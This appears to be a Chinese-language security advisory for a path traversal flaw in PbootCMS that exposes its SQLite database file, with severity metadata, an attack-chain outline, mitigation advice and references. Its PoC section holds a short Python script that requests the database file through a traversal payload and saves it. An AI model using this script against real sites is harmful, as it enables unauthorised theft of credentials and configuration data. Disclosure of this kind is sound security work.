CVE-2025-15153 CVSS 3.7 低危

CVE-2025-15153 PbootCMS SQLite数据库文件路径遍历漏洞

披露日期: 2025-12-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15153

漏洞类型

文件/目录遍历、信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PbootCMS

漏洞概述

PbootCMS 3.2.12及之前版本存在文件路径遍历漏洞，攻击者可通过构造恶意请求访问服务器上敏感的SQLite数据库文件（/data/pbootcms.db），该文件包含系统配置、用户凭证等敏感信息。漏洞无需认证即可利用，成功利用可导致敏感数据泄露。

技术细节

漏洞源于PbootCMS对用户输入的路径参数缺乏充分验证，攻击者可使用../等路径遍历字符访问系统任意文件。数据库文件存储在可预测的路径中，攻击者可直接下载获取敏感数据。

攻击链分析

STEP 1

攻击者识别目标运行PbootCMS并确定版本

STEP 2

构造包含路径遍历的恶意请求

STEP 3

发送请求下载SQLite数据库文件

STEP 4

提取并分析数据库获取敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

python
import requests

target = 'http://target.com'
payload = '../../../data/pbootcms.db'
url = f'{target}/index.php?s=/home/article/index&md_file={payload}'
response = requests.get(url)
if response.status_code == 200:
    with open('pbootcms.db', 'wb') as f:
        f.write(response.content)
    print('Database file downloaded successfully')

影响范围

PbootCMS <= 3.2.12

防御指南

临时缓解措施

暂时禁用文件下载功能或配置Web应用防火墙拦截路径遍历尝试

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15153
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15153
3 Details https://www.cvedetails.com/cve/CVE-2025-15153/
4 VulDB https://vuldb.com/cve/CVE-2025-15153
5 Link https://note-hxlab.wetolink.com/share/ALC1iSa8J56A
6 Link https://vuldb.com/?ctiid.338531
7 Link https://vuldb.com/?id.338531
8 Link https://vuldb.com/?submit.719814

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表